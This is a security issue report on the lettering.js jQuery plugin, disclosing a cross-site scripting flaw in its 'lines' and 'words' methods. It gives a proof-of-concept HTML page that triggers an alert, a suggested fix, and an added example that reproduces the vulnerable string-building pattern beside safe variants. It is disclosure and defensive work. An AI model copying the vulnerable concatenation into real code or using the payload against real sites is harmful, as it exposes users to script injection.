
Security issue: XSS for methods 'lines' and 'words' #88

@pcworld

Description

The injector first extracts the DOM text representation, then inserts it into HTML:

inject += '<span class="'+klass+(i+1)+'" aria-hidden="true">'+item+'</span>'+after;

Thus even when the server properly escapes user input, calling lettering on these DOM nodes converts it back to HTML, allowing for cross-site scripting (XSS).
This is probably only exploitable in the "lines" and "words" methods, because the default method splits into characters, and the < in <span><</span> is parsed as text by browsers.

Solution

Create the <span> programmatically using document.createElement and set the content using textContent.

Exploit

<!doctype html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script>
<script src="./jquery.lettering.js"></script>
</head>
<body>
<div id="exploitme">&lt;script&gt;alert(&quot;I'm properly escaped HTML&quot;);&lt;/script&gt;</div>
<script>
jQuery('#exploitme').lettering('lines');
</script>
</body>
</html>

A popup showing "I'm properly escaped HTML" will open, thus arbitrary code execution is achieved. Tested in Firefox 75.0 and Chromium 81.0.4044.113.
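As an added example (not code from the issue and not the lettering.js source), the text-to-HTML round trip in the injector line quoted above is modelled here as plain string functions so it can run under Node without a browser, beside an escaping-based hardening and a DOM version of the fix proposed under Solution (createElement plus textContent). The function names, the line-split marker, and the sample text are this example's own; the DOM variant needs a real document and is not exercised here.

```javascript
// Added example, not lettering.js code. Models the injector's behaviour at the
// string level: DOM text is re-inserted as markup, which is the XSS root cause.

// Mirrors the vulnerable pattern: each text piece is concatenated straight
// into HTML, so any '<' that survived the splitter becomes a tag again.
function buildSpansVulnerable(text, splitter, klass, after) {
  let inject = '';
  text.split(splitter).forEach((item, i) => {
    inject += '<span class="' + klass + (i + 1) + '" aria-hidden="true">' + item + '</span>' + after;
  });
  return inject;
}

// Minimal text-node escaping, sufficient for content placed between tags.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened string variant (an alternative to the DOM fix): every piece is
// escaped before it re-enters markup, so the text stays text.
function buildSpansEscaped(text, splitter, klass, after) {
  let inject = '';
  text.split(splitter).forEach((item, i) => {
    inject += '<span class="' + klass + (i + 1) + '" aria-hidden="true">' + escapeHtml(item) + '</span>' + after;
  });
  return inject;
}

// The fix the issue proposes, for a real DOM: build each span with
// createElement and assign the piece via textContent, so the HTML parser never
// sees it. `doc` is a browser document (assumption: window.document).
function appendSpansSafe(doc, container, text, splitter, klass, after) {
  container.textContent = '';                 // equivalent of jQuery .empty()
  container.setAttribute('aria-label', text); // attribute set via DOM API, not markup
  text.split(splitter).forEach((item, i) => {
    const span = doc.createElement('span');
    span.className = klass + (i + 1);
    span.setAttribute('aria-hidden', 'true');
    span.textContent = item;                  // never interpreted as markup
    container.appendChild(span);
    if (after) container.appendChild(doc.createTextNode(after));
  });
  return container;
}

// Constructed marker standing in for whatever the 'lines' method substitutes
// for <br> before splitting (the real plugin uses its own fixed token).
const LINE_MARKER = 'LINE_SPLIT_MARKER';

// Constructed sample: the text a browser yields for the issue's escaped <div>.
const SAMPLE = '<script>alert("I\'m properly escaped HTML");</script>';

// Compare the three split modes so the issue's reasoning can be checked:
// 'lines' and 'words' keep "<script>" contiguous, 'char' breaks it up.
function demo() {
  return {
    linesVulnerable: buildSpansVulnerable(SAMPLE, LINE_MARKER, 'line', ''),
    linesEscaped: buildSpansEscaped(SAMPLE, LINE_MARKER, 'line', ''),
    wordsVulnerable: buildSpansVulnerable(SAMPLE, ' ', 'word', ' '),
    charVulnerable: buildSpansVulnerable(SAMPLE, '', 'char', ''),
  };
}

console.log(demo());
```

Running the demo under Node shows why the issue singles out 'lines' and 'words': in those modes the whole `<script>` tag lands inside one span and is re-parsed as markup, while the 'char' mode leaves each character in its own span (`...><</span>`), which browsers treat as text. The escaped string variant is shown so the difference can be verified offline; the DOM variant is the more robust choice because no string is ever handed to the HTML parser.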
